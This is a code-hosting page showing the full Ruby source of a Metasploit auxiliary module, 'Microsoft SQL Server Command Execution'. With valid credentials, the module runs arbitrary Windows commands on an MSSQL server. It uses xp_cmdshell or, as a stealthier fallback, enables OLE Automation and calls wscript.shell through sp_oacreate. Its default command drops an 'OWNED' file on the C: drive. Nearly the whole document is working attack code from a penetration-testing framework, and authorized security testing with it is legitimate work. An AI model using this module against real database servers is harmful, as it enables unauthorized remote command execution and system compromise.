Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/mssql/mssql_exec.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::MSSQL

8
  include Msf::OptionalSession::MSSQL

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Microsoft SQL Server Command Execution',

15
        'Description' => %q{

16
          This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the

17
          sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is

18
          required to use this module.

19
        },

20
        'Author' => [

21
          'tebo <tebo[at]attackresearch.com>',

22
          'arcc <pw[at]evait.de>'

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],

27
          [ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],

28
        ],

29
        'Notes' => {

30
          'Stability' => [CRASH_SAFE],

31
          'SideEffects' => [IOC_IN_LOGS],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options([

38
      OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),

39
      OptEnum.new('TECHNIQUE', [true, 'Technique to use for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])

40
    ])

41
  end

42


43
  def run

44
    if session

45
      set_mssql_session(session.client)

46
    else

47
      unless mssql_login_datastore

48
        print_error('Error with mssql_login call')

49
        info = mssql_client.initial_connection_info

50
        if info[:errors] && !info[:errors].empty?

51
          info[:errors].each do |err|

52
            print_error(err)

53
          end

54
        end

55
        return

56
      end

57
    end

58


59
    technique = datastore['TECHNIQUE']

60
    case technique

61
    when 'xp_cmdshell'

62
      begin

63
        mssql_xpcmdshell(datastore['CMD'], true)

64
      rescue RuntimeError

65
        print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')

66
        mssql_spoacreate

67
      end

68
    when 'sp_oacreate'

69
      mssql_spoacreate

70
    end

71
  end

72


73
  def mssql_spoacreate

74
    doprint = datastore['VERBOSE']

75
    print_status('Enabling advanced options and ole automation procedures.')

76
    mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)

77
    mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)

78
    print_good('Executing command using sp_oacreate. No output will be displayed.')

79
    mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)

80
  end

81
end

82


83